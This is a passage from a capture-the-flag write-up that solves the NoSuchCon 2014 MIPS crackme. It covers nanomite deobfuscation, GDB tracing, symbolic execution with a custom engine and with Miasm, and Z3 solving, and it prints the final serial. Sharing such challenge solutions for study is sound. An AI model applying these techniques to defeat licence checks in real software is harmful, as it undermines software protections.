(let ((?x494 (concat (bvnot (bvor ((_ extract 31 31) (bvshl ?x392 ?x20)) ((_ extract 31 31) ?x388))) (bvor ((_ extract 30 30) (bvshl ?x392 ?x20)) ((_ extract 30 30) ?x388)) (bvnot (bvor ((_ extract 29 27) (bvshl ?x392 ?x20)) ((_ extract 29 27) ?x388))) (bvor ((_ extract 26 25) (bvshl ?x392 ?x20)) ((_ extract 26 25) ?x388)) (bvnot (bvor ((_ extract 24 23) (bvshl ?x392 ?x20)) ((_ extract 24 23) ?x388))) (bvor ((_ extract 22 21) (bvshl ?x392 ?x20)) ((_ extract 22 21) ?x388)) (bvnot (bvor ((_ extract 20 16) (bvshl ?x392 ?x20)) ((_ extract 20 16) ?x388))) (bvor ((_ extract 15 15) (bvshl ?x392 ?x20)) ((_ extract 15 15) ?x388)) (bvnot (bvor ((_ extract 14 14) (bvshl ?x392 ?x20)) ((_ extract 14 14) ?x388))) (bvor ((_ extract 13 12) (bvshl ?x392 ?x20)) ((_ extract 13 12) ?x388)) (bvnot (bvor ((_ extract 11 10) (bvshl ?x392 ?x20)) ((_ extract 11 10) ?x388))) (bvor ((_ extract 9 8) (bvshl ?x392 ?x20)) ((_ extract 9 8) ?x388)) (bvnot (bvor ((_ extract 7 2) (bvshl ?x392 ?x20)) ((_ extract 7 2) ?x388))) (bvor ((_ extract 1 1) (bvshl ?x392 ?x20)) ((_ extract 1 1) ?x388)) (bvnot (bvor ((_ extract 0 0) (bvshl ?x392 ?x20)) ((_ extract 0 0) ?x388))))))
(let ((?x450 (bvor (bvlshr ?x494 ?x20) (bvshl ?x494 ?x24))))
(bvor (bvlshr ?x450 ?x20) (bvshl ?x450 ?x24)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

Quite happy we don't have to study that right?

Extracting the function that generates the new program counter from the second magic value

For the second big block of code, we can do exactly the same thing: copy the code, configure the virtual environment with our symbolic variables and wrap the function:

def extract_equation_of_function_that_generates_new_son_pc():
  '''Extract the formula of the function generating the new son's $pc'''
  x = mini_mips_symexec_engine.MiniMipsSymExecEngine('function_that_generates_new_son_pc.log')
  x.debug = False
  x.enable_z3 = True
  tmp_pc = BitVec('magic', 32)
  n_loop = BitVec('n_loop', 32)
  x.stack['tmp_pc'] = tmp_pc
  x.stack['var_2F0'] = n_loop
  emu_generate_new_pc_for_son(x, print_final_state = False)
  compute_pc_equation = simplify(x.gpr['v0'])
  with open(os.path.join('formulas', 'generate_new_pc_son.smt2'), 'w') as f:
    f.write(to_SMT2(compute_pc_equation, name = 'generate_new_pc_son'))

  return tmp_pc, n_loop, compute_pc_equation

var_new_pc, var_n_loop, expr_new_pc = [None]*3
def generate_new_pc_from_magic_high(magic_high, n_loop):
  global var_new_pc, var_n_loop, expr_new_pc
  if var_new_pc is None and var_n_loop is None and expr_new_pc is None:
    var_new_pc, var_n_loop, expr_new_pc = extract_equation_of_function_that_generates_new_son_pc()

  return substitute(
      expr_new_pc,
      (var_new_pc, BitVecVal(magic_high, 32)),
      (var_n_loop, BitVecVal(n_loop, 32))
  ).as_long()

If you are interested in what the formula looks like, it is also available in the NoSuchCon2014 folder on my github.

Putting it all together: building a function that computes the new program counter of the son

Obviously, we don't really care about those two previous functions in isolation ; we just want to combine them to implement the computation of the new program counter from both the round number & the address where the son SIGTRAP'd. The only missing bit is the lookup in the QWORD array to extract the second magic value. We just have to dump the array inside another file called memory.py, which is done with a simple IDA Python one-liner:

values = dict((0x00414130+i*8, Qword(0x00414130+i*8)) for i in range(0x25E))

Now, we can build the whole function easily by combining all those pieces:

def generate_new_pc_from_pc_son_using_z3(pc_son, n_break):
  '''Generate the new program counter from the address where the son SIGTRAP'd and
  the number of SIGTRAP the son encountered'''
  loop_n = (n_break / 101)
  magic = generate_magic_from_son_pc_using_z3(pc_son, n_break)
  idx = None
  for i in range(len(memory.pcs)):
    if (memory.pcs[i] & 0xffffffff) == magic:
      idx = i
      break

  assert(idx != None)
  return generate_new_pc_from_magic_high(memory.pcs[idx] >> 32, loop_n)

Sweet. Really sweet.

This basically means we are now able to unscramble the code of the son and reorder it completely, without even physically running the binary or generating traces.

Unscramble the code like a sir

Before showing the code, I just want to explain the process one more time:

  1. The son executes some code until it reaches a break instruction
  2. The father gets the $pc of the son and the variable that counts the number of break instruction the son executed
  3. The father generates a new $pc value from those two variables
  4. The father sets the new $pc
  5. The father continues its son
  6. Goto 1!

So basically, to unscramble the code, we just need to simulate what the father would do & log everything somewhere. A couple of important details though:

  • There are exactly 101 break instructions in the son, so 101 chunks of code will be executed and need to be reordered,
  • The son is executing 6 rounds ; that's exactly why the QWORD array has 6*101 entries.

Here is the function I used:

def generate_son_code_reordered(debug = False):
    '''This function puts the son's blocks of code in the right order without
    relying on the father to set a new $pc value when a break is executed in the son.
    With this output we are good to go to create a nanomites-less binary:
      - We don't need the father anymore (he was driving the son)
      - We have the code in the right order, so we can also remove the break instructions
    It will also be quite useful when we want to execute its code symbolically.
    '''
    def parse_line(l):
        addr_seg, instr, _ = l.split(None, 2)
        _, addr = addr_seg.split(':')
        return int('0x%s' % addr, 0), instr

    son_code = code.block_code_of_son
    next_break = 0
    n_break = 0
    cleaned_code = []
    for _ in range(6):
        for z in range(101):
            i = 0
            while i < len(son_code):
                line = son_code[i]
                addr, instr = parse_line(line)
                if instr == 'break' and (next_break == addr or z == 0):
                    break_addr = addr
                    new_pc = generate_new_pc_from_pc_son_using_z3(break_addr, n_break)
                    n_break += 1
                    if debug:
                        print '; Found the %dth break (@%.8x) ; new pc will be %.8x' % (z, break_addr, new_pc)
                    state = 'Begin'
                    block = []
                    j = 0
                    while j < len(son_code):
                        line = son_code[j]
                        addr, instr = parse_line(line)
                        if state == 'Begin':
                            if addr == new_pc:
                                block.append(line)
                                state = 'Log'
                        elif state == 'Log':
                            if instr == 'break':
                                next_break = addr
                                state = 'End'
                            else:
                                block.append(line)
                        elif state == 'End':
                            break
                        else:
                            pass
                        j += 1

                    if debug:
                        print ';', '='*25, 'BLOCK %d' % z, '='*25
                        print '\n'.join(block)
                    cleaned_code.extend(block)
                    break
                i += 1

    return cleaned_code

And there it is :-)

The function outputs the unrolled and ordered code of the son. If you want to push things further, you could theoretically perform open-heart surgery to completely remove the nanomites from the original binary ; isn't that cool? This is left as an exercise for the interested reader though :-).

Attacking the son: the last man standing

Now that we have the code unscrambled, we can directly feed it to our engine but before doing so here are some details:

  • As we said earlier, it looks like the son is executing the same code 6 times. This is not the case at all: every round executes the same number of instructions, but not in the same order
  • The computations executed can be seen as some kind of light encoding/encryption or decoding/decryption algorithm
  • We have 6 rounds because the input serial is broken into 6 DWORDs (so 6 symbolic variables); basically each round is going to generate one output DWORD

As previously, we need to copy the code we want to execute. Note that we can also use generate_son_code_reordered to generate it dynamically. The next step is to configure the virtual environment, and we are good to finally run the code:

import mini_mips_symexec_engine
from z3 import *

def get_serial():
  print '> Instantiating the symbolic execution engine..'
  x = mini_mips_symexec_engine.MiniMipsSymExecEngine('decrypt_serial.log')
  x.enable_z3 = True

  print '> Generating dynamically the code of the son & reorganizing/cleaning it..'
  # If you don't want to generate it dynamically like a sir, I've copied a version inside
  # code.block_code_of_son_reorganized_loop_unrolled :-)
  x.code = generate_son_code_reordered()

  print '> Configuring the virtual environment..'
  x.gpr['fp'] = 0x7fff6cb0
  x.stack_offsets['var_30'] = 24
  start_addr = x.gpr['fp'] + x.stack_offsets['var_30'] + 8
  # (gdb) x/6dwx $s8+24+8
  # 0x7fff6cd0:     0x11111111      0x11111111      0x11111111
  #                 0x11111111      0x11111111      0x11111111
  a, b, c, d, e, f = BitVecs('a b c d e f', 32)
  x.mem[start_addr +  0] = a
  x.mem[start_addr +  4] = b
  x.mem[start_addr +  8] = c
  x.mem[start_addr + 12] = d
  x.mem[start_addr + 16] = e
  x.mem[start_addr + 20] = f

  print '> Running the code..'
  x.run()

The thing that matters this time is to find a, b, c, d, e, f such that they generate specific outputs; this is where Z3 is going to help us a lot. Thanks to it, we don't need to manually invert the algorithm.

The final bit is basically just about setting up the solver, adding the correct constraints and generating the serial you guys have been waiting for:

print '> Instantiating & configuring the solver..'
s = Solver()
s.add(
  x.mem[start_addr +   0] == 0x7953205b, x.mem[start_addr +   4] == 0x6b63616e,
  x.mem[start_addr +   8] == 0x20766974, x.mem[start_addr +  12] == 0x534e202b, 
  x.mem[start_addr +  16] == 0x203d2043, x.mem[start_addr +  20] == 0x5d20333c,
)

print '> Solving..'
if s.check() == sat:
  print '> Constraints solvable, here are the 6 DWORDs:'
  m = s.model()
  for i in (a, b, c, d, e, f):
    print ' %r = 0x%.8X' % (i, m[i].as_long())

  print '> Serial:', ''.join(('%.8x' % m[i].as_long())[::-1] for i in (a, b, c, d, e, f)).upper()
else:
  print '! Constraints unsolvable'

There we are, the final moment; drum roll...

PS D:\Codes\NoSuchCon2014> python .\solve_nsc2014_step1_z3.py
==================================================
Tests OK -- you are fine to go
==================================================
> Instantiating the symbolic execution engine..
> Generating dynamically the code of the son & reorganizing/cleaning it..
> Configuring the virtual environment..
> Running the code..
> Instantiating & configuring the solver..
> Solving..
> Constraints solvable, here are the 6 DWORDs:
  a = 0xFE446223
  b = 0xBA770149
  c = 0x75BA5111
  d = 0x78EA3635
  e = 0xA9D6E85F
  f = 0xCC26C5EF
> Serial: 322644EF941077AB1115AB575363AE87F58E6D9AFE5C62CC
==================================================

overclok@wildout:~/chall/nsc2014$ ./start_vm.sh
[    0.000000] Initializing cgroup subsys cpuset
[...]
Debian GNU/Linux 7 debian-mipsel ttyS0

debian-mipsel login: root
Password:
[...]
root@debian-mipsel:~# /home/user/crackmips 322644EF941077AB1115AB575363AE87F58E6D9AFE5C62CC
good job!
Next level is there: http://nsc2014.synacktiv.com:65480/oob4giekee4zaeW9/

Boom :-).
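
By the way, if the link between the 6 DWORDs and the serial string looks magic: each DWORD is formatted as 8 hex characters and the resulting string is simply reversed, which is exactly what the [::-1] in the final print above does. A quick standalone check:

dwords = [0xFE446223, 0xBA770149, 0x75BA5111,
          0x78EA3635, 0xA9D6E85F, 0xCC26C5EF]
serial = ''.join(('%.8x' % d)[::-1] for d in dwords).upper()
assert serial == '322644EF941077AB1115AB575363AE87F58E6D9AFE5C62CC'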

Alternative solution

In this part, I present an alternative solution to the challenge. It's somewhat of a shortcut, since it requires much less coding than Axel's solution, and it uses the awesome Miasm framework.

Shortcut #1: Tracing the parent with GDB

Quick recap of the parent's behaviour

As Axel has previously explained, the first step is to recover the child's execution flow. Because of nanomites, the child is driven by the parent; we have to analyze the parent (i.e. the debug function) first to determine the correct sequence of the child's pc values.

The parent's main loop is obfuscated, but by browsing cross-references of stack variables in IDA, we can see where each one is used. After a bit of analysis, we can try to decompile the algorithm by hand and write a pseudo-Python description of what the debug function does (heavily simplified):

counter = 0
waitpid()

while True:
    regs = ptrace(GETREGS)

    # big block 1
    addr = regs.pc
    param = f(counter)
    addr = obfu1(addr, param)

    for i in range(605):
        entry = pcs[i]  # entry is 8 bytes long (2 dwords)
        if addr == entry.first_dword:
            addr = entry.second_dword
            break

    # big block 2
    addr = obfu2(addr, param)

    regs.pc = addr
    ptrace(SETREGS, regs)
    counter += 1

    if not waitpid():
        break

The "big blocks" are the two long assembly blocks preceding and following the inner loop. Without looking at the gory details, we understand that a param value is derived from the counter using a function that I call f, and then used to obfuscate the original child's pc. The result is then searched in a pcs array (stored at address 0414130), the next dword is extracted and used in a 2nd obfuscation pass to finally produce the new pc value injected into the child.

The most important fact here is that this process does not involve the input key at any time. The output pc sequence is deterministic and constant; two executions with two different keys will produce the same sequence of pc's. Since we know the first value of pc (the first break instruction at 0x40228C), we can theoretically compute the correct sequence and then reorder the child's instructions according to this sequence.

We have two approaches for doing so:

  • static analysis: understand each instruction used in the obfuscation passes and rewrite the algorithm producing the correct sequence. This is the path followed by Axel.
  • dynamic analysis: trace the program once and log all pc values.

Although the first one is probably the most interesting, the second is certainly the fastest. Again, it only works because the input key does not influence the output pc sequence. And we're lucky: the child is already debugged by the parent, but nothing prevents us from debugging the parent itself.

First attempt at tracing

Tracing is pretty straightforward with GDB using breakpoints and the commands directive. In order to understand the parent's algorithm a bit better, I first wrote a pretty verbose GDB script that prints the loop counter and the param variable, as well as the original and new child's pc, for each iteration. I chose to put two breakpoints:

  • The first one at the end of the first obfuscation block (0x401440)
  • The second one before the ptrace call at the end of the second block (0x0401D8C), in order to be able to read the child's pc manipulated by the parent.

Here is the script:

##################################
# A few handy functions
##################################

def print_context_pc
    printf "regs.pc = 0x%08x\n", *(int*)($fp-0x1cc)
end

def print_param
    printf "param = 0x%08x\n", *(int*)($fp-0x2f0)
end

def print_addr
    printf "addr = 0x%08x\n", *(int*)($fp-0x2fc)
end

def print_counter
    printf "counter = %d\n", *(int*)($fp-0x300)
end

##################################

set pagination off
set confirm off
file crackmips
target remote 127.0.0.1:4444 # gdbserver address

# break at the end of block 1
b *0x401440
commands
silent
printf "\nNew round\n"
print_counter
print_context_pc
print_param 
print_addr
c
end

# break before the end of block 2
b *0x0401D8C
commands
silent
print_context_pc
c
end

c

To run that script within GDB, we first need to start crackmips with gdbserver in our qemu VM. After a few minutes, we get the following (cleaned) trace:

New round
counter = 0
regs.pc = 0x0040228c
param = 0x00000000
addr = 0xcd0e9f0e
regs.pc = 0x00402290

New round
counter = 1
regs.pc = 0x004022bc
param = 0x00000000
addr = 0xcd0e99ae
regs.pc = 0x00402ce0

New round
counter = 2
regs.pc = 0x00402d0c
param = 0x00000000
addr = 0xcd0e420e
regs.pc = 0x00402da8

[...]

By reading the trace further, we realize that param is always equal to counter/101. This is actually the child's own loop counter, since its big loop is made of 101 pseudo basic blocks. We also notice that the pc sequence is different for each round of the child's loop: iteration 0 is not equal to iteration 101, etc.
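
If you want to double-check that relation, a few lines of Python over the verbose trace will do (a sketch; the trace file name is hypothetical):

import re

# Hypothetical file containing the verbose GDB trace shown above
log = open('gdb_verbose_trace.txt').read()
pairs = re.findall(r'counter = (\d+)\nregs\.pc = \S+\nparam = (0x[0-9a-f]+)', log)
assert all(int(p, 16) == int(c) / 101 for c, p in pairs)
print 'param == counter / 101 holds for all %d iterations' % len(pairs)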

Getting a clean trace

Since we're only interested in the final pc value for each iteration, we can make a simpler script that just outputs those values, organized in a parsable format so we can reuse them later in another script. Here is version 2 of the script:

def print_context_pc
    printf "0x%08x\n", *(int*)($fp-0x1cc)
end

set pagination off
set confirm off
file crackmips
target remote 127.0.0.1:4444

# break before the end of block 2
b *0x0401D8C
commands
silent
print_context_pc
c
end

c

The cleaned trace only contains the 606 pc values, one on each line:

0x00402290
0x00402ce0
0x00402da8
0x00403550
[...]
0x004030e4
0x004039dc

Mission 1: accomplished!

Shortcut #2: Symbolic execution using Miasm

We now have the list of each start address of each basic block executed by the child. The next step is to understand what each one of them does, and reorder them to reproduce the whole algorithm.

Even though writing a symbolic execution engine from scratch is certainly a fun and interesting exercise, I chose to play with Miasm. This excellent framework can disassemble binaries for various architectures (among them x86, x64, ARM, MIPS, etc.) and convert them into an intermediate language called IR (intermediate representation). It is then able to perform symbolic execution on this IR in order to find the side effects of a basic block on registers and memory locations. Although there is not much documentation, Miasm contains various examples that should make the API easier to dig into. Don't tell me that it is hard to install, it really isn't (well, I haven't tried on Windows ;). And there is even a Docker image, so you have no excuse not to try it!

Miasm symbolic execution 101

Before scripting everything, let's first see how to use Miasm to perform symbolic execution of one basic block. For the sake of simplicity, let's work on the first basic block of the child's main loop.

from miasm2.analysis.machine import Machine
from miasm2.analysis import binary

bi = binary.Container("crackmips")
machine = Machine('mips32l')
mn, dis_engine_cls, ira_cls = machine.mn, machine.dis_engine, machine.ira

First, we open the crackme using the generic Container class. It automatically detects the executable format and uses Elfesteem to parse it. Then we use the handy Machine class to get references to useful classes we'll use to disassemble and analyze the binary.

BB_BEGIN = 0x00402290
BB_END = 0x004022BC

# Disassemble between BB_BEGIN and BB_END
dis_engine = dis_engine_cls(bs=bi.bs)
dis_engine.dont_dis = [BB_END]
bloc = dis_engine.dis_bloc(BB_BEGIN)
print '\n'.join(map(str, bloc.lines))

Here, we disassemble a single basic block by explicitly telling Miasm its start and end addresses. The disassembler is created by instantiating the dis_engine_cls class. bi.bs represents the binary stream we are working on. I admit the dont_dis syntax is a bit weird; it is used to tell Miasm to stop disassembling when it reaches a given address. We do it here because the next instruction is a break, and Miasm would not otherwise consider it the end of a basic block. When you run those lines, you should get this output:

LW         V1, 0x38(FP)
SLL        V0, V1, 0x2
ADDIU      A0, FP, 0x18
ADDU       V0, A0, V0
LW         A0, 0x8(V0)
LW         V0, 0x38(FP)
SUBU       A0, A0, V0
SLL        V0, V1, 0x2
ADDIU      V1, FP, 0x18
ADDU       V0, V1, V0
SW         A0, 0x8(V0)

Okay, so we know how to disassemble a block with Miasm. Let's now see how to convert it into the Intermediate Representation:

# Transform to IR
ira = ira_cls()
irabloc = ira.add_bloc(bloc)[0]
print '\n'.join(map(lambda b: str(b[0]), irabloc.irs))

We instantiated the ira_cls class and called its add_bloc method. It takes a basic block as input and outputs a list of IR basic blocks; here we know that we'll get only one, so we use [0]. Let's see the output of those lines:

V1 = @32[(FP+0x38)]
V0 = (V1 << 0x2)
A0 = (FP+0x18)
V0 = (A0+V0)
A0 = @32[(V0+0x8)]
V0 = @32[(FP+0x38)]
A0 = (A0+(- V0))
V0 = (V1 << 0x2)
V1 = (FP+0x18)
V0 = (V1+V0)
@32[(V0+0x8)] = A0
IRDst = loc_00000000004022BC:0x004022bc

Each of those lines is an instruction in Miasm's IR language. It is pretty simple: each instruction is described as a list of side effects it has on some variables, using expressions and assignments. @32[...] represents a 32-bit memory access; when it's on the left of an = sign it's a write access, when it's on the right it's a read. The last line uses the pseudo-register IRDst, which is kind of the IR's pc register: it tells Miasm where the next basic block is located.
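
Those expressions are regular Python objects, by the way. A quick illustration of how you would build @32[(FP+0x38)] yourself (nothing from the challenge, just playing with the API we use later for the simplification rules):

from miasm2.expression.expression import ExprId, ExprInt32, ExprMem

fp = ExprId('FP', 32)
e = ExprMem(fp + ExprInt32(0x38), 32)
print e  # @32[(FP+0x38)]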

Great! Let's see now how to perform symbolic execution on this IR basic block.

from miasm2.expression.expression import *
from miasm2.ir.symbexec import symbexec
from miasm2.expression.simplifications import expr_simp

# Prepare symbolic execution
symbols_init = {}
for i, r in enumerate(mn.regs.all_regs_ids):
    symbols_init[r] = mn.regs.all_regs_ids_init[i]

# Perform symbolic exec
sb = symbexec(ira, symbols_init)
sb.emulbloc(irabloc)

mem, exprs = sb.symbols.symbols_mem.items()[0]
print "Memory changed at %s :" % mem
print "\tbefore:", exprs[0]
print "\tafter:", exprs[1]

The first lines initialize the symbol pool used for symbolic execution. We then use the symbexec module to create an execution engine, and we give it our fresh IR basic block. The result of the execution is readable by browsing the attributes of sb.symbols. Here I am mainly interested in the memory side effects, so I use symbols_mem.items() to list them. symbols_mem is actually a dict whose keys are the memory locations that changed during execution, and whose values are pairs containing the previous value of that memory cell and the new one. There's only one change, and here it is:

Memory changed at (FP_init+(@32[(FP_init+0x38)] << 0x2)+0x20) :
  before: @32[(FP_init+(@32[(FP_init+0x38)] << 0x2)+0x20)]
  after: (@32[(FP_init+(@32[(FP_init+0x38)] << 0x2)+0x20)]+(- @32[(FP_init+0x38)]))
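
Since symbols_mem behaves like a dict, you can also just walk it directly when a block touches several cells; a small sketch of mine, reusing the sb object from above:

for where, (before, after) in sb.symbols.symbols_mem.items():
    print 'Memory changed at %s' % where
    print '\tbefore:', before
    print '\tafter:', after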

The expressions are getting a bit more complex, but still pretty readable. FP_init represents the value of the fp register at the beginning of the execution. We can clearly see that a memory location was modified: a value was subtracted from it. But we can do better: we can give Miasm simplification rules in order to make this output much more readable. Let's do it!

# Simplifications
fp_init = ExprId('FP_init', 32)
zero_init = ExprId('ZERO_init', 32)
e_i_pattern = expr_simp(ExprMem(fp_init + ExprInt32(0x38), 32))
e_i = ExprId('i', 32)
e_pass_i_pattern = expr_simp(ExprMem(fp_init + (e_i << ExprInt32(2)) + ExprInt32(0x20), 32))
e_pass_i = ExprId("pwd[i]", 32)

simplifications = {e_i_pattern      : e_i,
                    e_pass_i_pattern : e_pass_i,
                    zero_init        : ExprInt32(0) }

def my_simplify(expr):
    expr2 = expr.replace_expr(simplifications)
    return expr2

print "%s = %s" % (my_simplify(exprs[0]) ,my_simplify(exprs[1]))

Here we declare 3 replacement rules:

  • Replace @32[(FP_init+0x38)] with i
  • Replace @32[(FP_init+(i << 0x2)+0x20)] with pwd[i]
  • Replace ZERO_init with 0 (although it is not really useful here)

There is actually a more generic way to do it using pattern matching rules with jokers, but we don't really need this machinery here. This is the result we get after simplification:

pwd[i] = (pwd[i]+(- i))

That's all! So all this basic block does is a subtraction. What is nice is that the output is actually valid Python code :). This will be very useful in the last part.
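
To illustrate that point, the generated lines can literally be exec'd on concrete values (a toy example of mine below); just keep in mind that plain Python integers don't wrap around at 32 bits, which is one more reason to feed the lines to Z3's BitVecs instead:

# Toy example: run the generated expression on concrete values
pwd = [0x11111111] * 6
i = 3
exec 'pwd[i] = (pwd[i]+(- i))'
print hex(pwd[3])  # 0x1111110e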

Generating the child's algorithm

So in less than 60 lines, we were able to disassemble an arbitrary basic block, perform symbolic execution on it and get a pretty understandable result. We just need to apply this logic to the 100 remaining blocks, and we'll have a pythonic version of each one of them. Then, we simply reorder them using the GDB trace we got from the previous part, and we'll be able to generate 606 Python lines describing the whole algorithm.

Here is an extract of the script automating all of this:

def load_trace(filename):
    return [int(x.strip(), 16) for x in open(filename).readlines()]

def boundaries_from_trace(trace):
    bb_starts = sorted(set(trace))
    boundaries = [(bb_starts[i], bb_starts[i+1]-4) for i in range(len(bb_starts)-1)]
    boundaries.append((0x4039DC, 0x04039E8)) # last basic block, added by hand
    return boundaries

def exprs2str(exprs):
    return ' = '.join(str(e) for e in exprs)

trace = load_trace("gdb_trace.txt")
boundaries = boundaries_from_trace(trace)

print "# Building IR blocs & expressions for all basic blocks"
bb_exprs = []
for zone in boundaries:
    bb_exprs.append(analyse_bb(*zone))

print "# Reconstructing the whole algorithm based on GDB trace"
bb_starts = [x[0] for x in boundaries]
for bb_ea in trace:
    bb_index = bb_starts.index(bb_ea)
    #print "%x : %s" % (bb_ea, exprs2str(bb_exprs[bb_index]))
    print exprs2str(bb_exprs[bb_index])

The analyse_bb() function performs symbolic execution on a single basic block, given its start and end addresses; it just wraps what we've been doing so far into a function (a reconstruction is sketched below). The GDB trace is opened and parsed, and a list of basic block addresses is built from it (we cheat a little bit for the last one of the loop, by hardcoding it). Each basic block is analyzed and the resulting expressions are pushed into the bb_exprs list. Then the GDB trace is processed, outputting the expressions corresponding to each basic block.
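
For completeness, analyse_bb() is essentially the disassembly / IR / symbolic execution / simplification steps from the previous sections glued together. Here is my reconstruction of it (the real helper lives in the full script, so details may differ slightly):

def analyse_bb(start, end):
    '''Disassembles the basic block [start, end], lifts it to IR, runs the
    symbolic execution engine on it and returns the simplified before/after
    expressions of the memory cell the block modifies.'''
    dis_engine = dis_engine_cls(bs=bi.bs)
    dis_engine.dont_dis = [end]  # stop right before the trailing break
    bloc = dis_engine.dis_bloc(start)

    ira = ira_cls()
    irabloc = ira.add_bloc(bloc)[0]

    # Fresh symbols for every block, so no state leaks between executions
    symbols = dict(zip(mn.regs.all_regs_ids, mn.regs.all_regs_ids_init))
    sb = symbexec(ira, symbols)
    sb.emulbloc(irabloc)

    _, exprs = sb.symbols.symbols_mem.items()[0]
    return [my_simplify(e) for e in exprs]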

This is what we get:

# Building IR blocs & expressions for all basic blocks
# Reconstructing the whole algorithm based on GDB trace
pwd[i] = (pwd[i]+(- i))
pwd[i] = ((0x0|pwd[i])^0xFFFFFFFF)
pwd[i] = (pwd[i]^i)
pwd[i] = (pwd[i]^i)
pwd[i] = (pwd[i]+0x3ECA6F23)
pwd[i] = (pwd[i]+0x6EDC032)
[...]
pwd[i] = ((pwd[i] << 0x14)|(pwd[i] >> 0xC))
pwd[i] = ((pwd[i] << ((i+0x1)&0x1F))|(pwd[i] >> ((((0x0|i)^0xFFFFFFFF)+0x20)&0x1F)))
i = (i+0x1)

Solving with Z3

Okay, so now we have a Python (and even C ;) file describing the operations performed on the 6 dwords containing the input key. We could try to bruteforce it, but using a constraint solver is much more elegant and faster. I also chose Z3 because it has nice Python bindings. And since its expression syntax is mostly compatible with Python, we just need to add a few things to our generated file!

from z3 import *
import struct

solution_str = "[ Synacktiv + NSC = <3 ]"
solutions = struct.unpack("<LLLLLL", solution_str)
N = len(solutions)

# Hook Z3's `>>` so it works with our algorithm
# (logical shift instead of arithmetic one)
BitVecRef.__rshift__  = LShR

pwd = [BitVec("pwd_%d" % i, 32) for i in range(N)]
pwd_orig = [pwd[i] for i in range(N)]
i = 0

# paste here all the generated algorithm from previous part
# BEGIN ALGO
pwd[i] = (pwd[i]+(- i))
pwd[i] = ((0x0|pwd[i])^0xFFFFFFFF)
# [...]
pwd[i] = ((pwd[i] << ((i+0x1)&0x1F))|(pwd[i] >> ((((0x0|i)^0xFFFFFFFF)+0x20)&0x1F)))
i = (i+0x1)
# END ALGO

s = Solver()

for i in range(N):
    s.add(pwd[i] == solutions[i])

assert s.check() == sat

m = s.model()
sol_dw = [m[pwd_orig[i]].as_long() for i in range(N)]
key = ''.join(("%08x" % dw)[::-1].upper() for dw in sol_dw)

print "KEY = %s" % key

We've declared the valid solution, the list of 6 32-bit variables (pwd), pasted the algorithm, and ran the solver. We just need to be careful with the >> operation, since Z3 treats it as an arithmetic shift, and we want a logical one. So we replace it with a dirty hook.
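
If you're wondering what would go wrong without the hook, here is a standalone illustration of mine (to be run before installing the hook) on a value with the sign bit set:

from z3 import BitVecVal, LShR, simplify

v = BitVecVal(0x80000000, 32)
print '%.8x' % simplify(v >> 4).as_long()      # f8000000: arithmetic shift drags the sign bit along
print '%.8x' % simplify(LShR(v, 4)).as_long()  # 08000000: logical shift, what the MIPS code expects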

The solution should come almost instantly:

$ python sample_solver.py
KEY = 322644EF941077AB1115AB575363AE87F58E6D9AFE5C62CC

Alternative solution - conclusion

I chose this solution not only to get acquainted with Miasm, but also because it required much less effort and pain :). It fits into approximately 20 lines of GDB script, and 120 lines of Python using Miasm and Z3. You can find all of those in this folder. I hope it gave you an understandable example of symbolic execution and what you can do with it. However, I strongly encourage you to dig into Miasm's code and examples if you want to really understand what's going on under the hood.

War's over, the final words

I guess this is where I thank both @elvanderb for this really cool challenge and @synacktiv for letting him write it :-). Emilien and I also hope you enjoyed the read, feel free to contact any of us if you have any remarks/questions/whatever.

Also, special thanks to @__x86 and @jonathansalwan for proofreading!

The code/traces/tools developed in this post are all available on GitHub here and here!

By the way, don't hesitate to contact a member of the staff if you have a cool post you would like to see here -- you too can end up in doar-e's wall of fame :-).
